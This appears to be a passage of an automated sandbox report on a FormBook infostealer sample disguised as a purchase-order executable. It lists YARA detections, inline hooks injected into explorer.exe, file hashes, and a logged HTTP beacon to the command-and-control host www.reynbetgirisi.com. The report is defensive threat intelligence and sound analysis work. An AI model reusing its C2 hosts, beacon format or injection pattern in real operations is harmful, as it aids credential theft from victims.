                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePPO_101&102.exe, 00000001.00000002.311135246.00000000033C1000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.jiyu-kobo.co.jp/cPO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleasePO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sandoll.co.krEPO_101&102.exe, 00000001.00000003.286605823.0000000006456000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.zhongyicts.com.cnPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sakkal.comPO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fonts.com-uPO_101&102.exe, 00000001.00000003.285166630.000000000646B000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.178.208.163
                                      www.reynbetgirisi.comRussian Federation
                                      57724DDOS-GUARDRUtrue

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:510600
                                      Start date:28.10.2021
                                      Start time:00:35:11
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 3s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:PO_101&102.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:28
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@9/1@2/1
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 16.2% (good quality ratio 14.5%)
                                      • Quality average: 72%
                                      • Quality standard deviation: 31.2%
                                      HCA Information:
                                      • Successful, ratio: 97%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.49.157.6, 93.184.221.240, 20.54.110.249, 52.251.79.25, 40.112.88.60, 40.91.112.76, 80.67.82.211, 80.67.82.235, 20.82.210.154
                                      • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      00:36:12API Interceptor2x Sleep call for process: PO_101&102.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      185.178.208.163S.O.A.exeGet hashmaliciousBrowse
                                      • www.reynbetgirisi.com/snr6/?Q2JHDn=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF+l+57NdrJs1X3zFqihgss&j0Gh4=5j9l3Fyx

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      www.reynbetgirisi.comS.O.A.exeGet hashmaliciousBrowse
                                      • 185.178.208.163

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      DDOS-GUARDRUS.O.A.exeGet hashmaliciousBrowse
                                      • 185.178.208.163
                                      6xVYuXitGI.exeGet hashmaliciousBrowse
                                      • 185.178.208.148
                                      vbc.exeGet hashmaliciousBrowse
                                      • 185.129.100.113
                                      pYXAhd1foP.exeGet hashmaliciousBrowse
                                      • 185.129.100.113
                                      DeqrIfxzHW.exeGet hashmaliciousBrowse
                                      • 185.129.100.113
                                      Elon Musk Club - 024705 .htmGet hashmaliciousBrowse
                                      • 185.129.100.115
                                      loligang.x86Get hashmaliciousBrowse
                                      • 185.129.101.234
                                      APfSnkgVzUGet hashmaliciousBrowse
                                      • 185.129.101.214
                                      PO650.exeGet hashmaliciousBrowse
                                      • 77.220.207.191
                                      ABhHk2dXUE.exeGet hashmaliciousBrowse
                                      • 185.178.208.180
                                      vrTEp3LkwG.exeGet hashmaliciousBrowse
                                      • 185.178.208.180
                                      sDsPEdoFdb.exeGet hashmaliciousBrowse
                                      • 185.178.208.177
                                      SEPTEMBER ORDER.xlsxGet hashmaliciousBrowse
                                      • 185.178.208.164
                                      Decline-331847309-06242021.xlsmGet hashmaliciousBrowse
                                      • 5.253.62.174
                                      Decline-331847309-06242021.xlsmGet hashmaliciousBrowse
                                      • 5.253.62.174
                                      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
                                      • 185.240.103.219
                                      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
                                      • 185.240.103.219
                                      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
                                      • 185.240.103.219
                                      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
                                      • 185.240.103.219
                                      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
                                      • 185.240.103.219

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_101&102.exe.log
                                      Process:C:\Users\user\Desktop\PO_101&102.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1314
                                      Entropy (8bit):5.350128552078965
                                      Encrypted:false
                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.427190609127641
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:PO_101&102.exe
                                      File size:684032
                                      MD5:c8a5346cb632c91e0006252fd2c47bec
                                      SHA1:a671570c31428ebc9bee30c9a2b9963bf629560a
                                      SHA256:46a0a8595dccf134213c2e9ae10dd6fdd8e3ff5f0cb1b01014a6b67e31927eec
                                      SHA512:eb3f2e70339e04821b86ced686a47abec277f59a0f90d03b512d6023d71d24de0ae84c36983291d40ecbb4765b94d146affea45b8d09d0d000633af20cfdf528
                                      SSDEEP:12288:fhwV/8FumO5ZBLbGZ3EEFdmgTSuAReaSA7hqJFTP:fmV/8FumO/B3GtnmRufo7hq
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7vya..............P..f..........B.... ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x4a8542
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x61797637 [Wed Oct 27 15:54:31 2021 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa84f00x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x5a4.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xa65480xa6600False0.698281073911data7.43588694795IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc0xaa0000x5a40x600False0.418619791667data4.06372822623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xac0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_VERSION0xaa0900x314data
                                      RT_MANIFEST0xaa3b40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Version Infos

                                      DescriptionData
                                      Translation0x0000 0x04b0
                                      LegalCopyrightCopyright 2019
                                      Assembly Version1.0.0.0
                                      InternalNameenNNpuJ.exe
                                      FileVersion1.0.0.0
                                      CompanyName
                                      LegalTrademarks
                                      Comments
                                      ProductNameplacement
                                      ProductVersion1.0.0.0
                                      FileDescriptionplacement
                                      OriginalFilenameenNNpuJ.exe

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 28, 2021 00:37:54.351341009 CEST4981680192.168.2.3185.178.208.163
                                      Oct 28, 2021 00:37:54.375788927 CEST8049816185.178.208.163192.168.2.3
                                      Oct 28, 2021 00:37:54.376008034 CEST4981680192.168.2.3185.178.208.163
                                      Oct 28, 2021 00:37:54.376329899 CEST4981680192.168.2.3185.178.208.163
                                      Oct 28, 2021 00:37:54.401038885 CEST8049816185.178.208.163192.168.2.3
                                      Oct 28, 2021 00:37:54.402657032 CEST8049816185.178.208.163192.168.2.3
                                      Oct 28, 2021 00:37:54.402678967 CEST8049816185.178.208.163192.168.2.3
                                      Oct 28, 2021 00:37:54.403064013 CEST4981680192.168.2.3185.178.208.163
                                      Oct 28, 2021 00:37:54.403167963 CEST4981680192.168.2.3185.178.208.163
                                      Oct 28, 2021 00:37:54.717906952 CEST4981680192.168.2.3185.178.208.163
                                      Oct 28, 2021 00:37:54.741796017 CEST8049816185.178.208.163192.168.2.3

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 28, 2021 00:37:54.252959013 CEST5652753192.168.2.38.8.8.8
                                      Oct 28, 2021 00:37:54.319506884 CEST53565278.8.8.8192.168.2.3
                                      Oct 28, 2021 00:38:15.052742004 CEST4955953192.168.2.38.8.8.8
                                      Oct 28, 2021 00:38:15.117805004 CEST53495598.8.8.8192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Oct 28, 2021 00:37:54.252959013 CEST192.168.2.38.8.8.80x4941Standard query (0)www.reynbetgirisi.comA (IP address)IN (0x0001)
                                      Oct 28, 2021 00:38:15.052742004 CEST192.168.2.38.8.8.80x80cfStandard query (0)www.francinegeorges.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Oct 28, 2021 00:37:54.319506884 CEST8.8.8.8192.168.2.30x4941No error (0)www.reynbetgirisi.com185.178.208.163A (IP address)IN (0x0001)
                                      Oct 28, 2021 00:38:15.117805004 CEST8.8.8.8192.168.2.30x80cfName error (3)www.francinegeorges.comnonenoneA (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.reynbetgirisi.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.349816185.178.208.16380C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Oct 28, 2021 00:37:54.376329899 CEST5185OUTGET /snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF+l+57NdrJs1Xds1ailiks&l0D0=fJBTE HTTP/1.1
                                      Host: www.reynbetgirisi.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Oct 28, 2021 00:37:54.402657032 CEST5186INHTTP/1.1 301 Moved Permanently
                                      Server: ddos-guard
                                      Date: Wed, 27 Oct 2021 22:37:54 GMT
                                      Connection: close
                                      Location: https://www.reynbetgirisi.com/snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF+l+57NdrJs1Xds1ailiks&l0D0=fJBTE
                                      Content-Type: text/html; charset=utf8
                                      Content-Length: 568
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 33 30 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 20 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 20 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 70 3e 3c 62 3e 33 30 31 20 2d 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 20 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 52 65 71 75 65 73 74 65 64 20 63 6f 6e 74 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 20 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e
                                      Data Ascii: <!DOCTYPE html><html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 301</title><style>*{margin:0;padding:0}html{font:15px/22px arial,sans-serif;background: #fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}p{margin:11px 0 22px;overflow :hidden}ins{color:#777;text-decoration :none;}</style><p><b>301 - Moved Permanently .</b> <ins>Thats an error.</ins><p>Requested content has been permanently moved. <ins>Thats all we know.</ins>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE3
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE3
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE3
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE3

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:00:36:04
                                      Start date:28/10/2021
                                      Path:C:\Users\user\Desktop\PO_101&102.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\PO_101&102.exe'
                                      Imagebase:0xf90000
                                      File size:684032 bytes
                                      MD5 hash:C8A5346CB632C91E0006252FD2C47BEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:00:36:14
                                      Start date:28/10/2021
                                      Path:C:\Users\user\Desktop\PO_101&102.exe
                                      Wow64 process (32bit):false
                                      Commandline:{path}
                                      Imagebase:0x180000
                                      File size:684032 bytes
                                      MD5 hash:C8A5346CB632C91E0006252FD2C47BEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      General

                                      Start time:00:36:15
                                      Start date:28/10/2021
                                      Path:C:\Users\user\Desktop\PO_101&102.exe
                                      Wow64 process (32bit):true
                                      Commandline:{path}
                                      Imagebase:0xaf0000
                                      File size:684032 bytes
                                      MD5 hash:C8A5346CB632C91E0006252FD2C47BEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:00:36:18
                                      Start date:28/10/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff720ea0000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
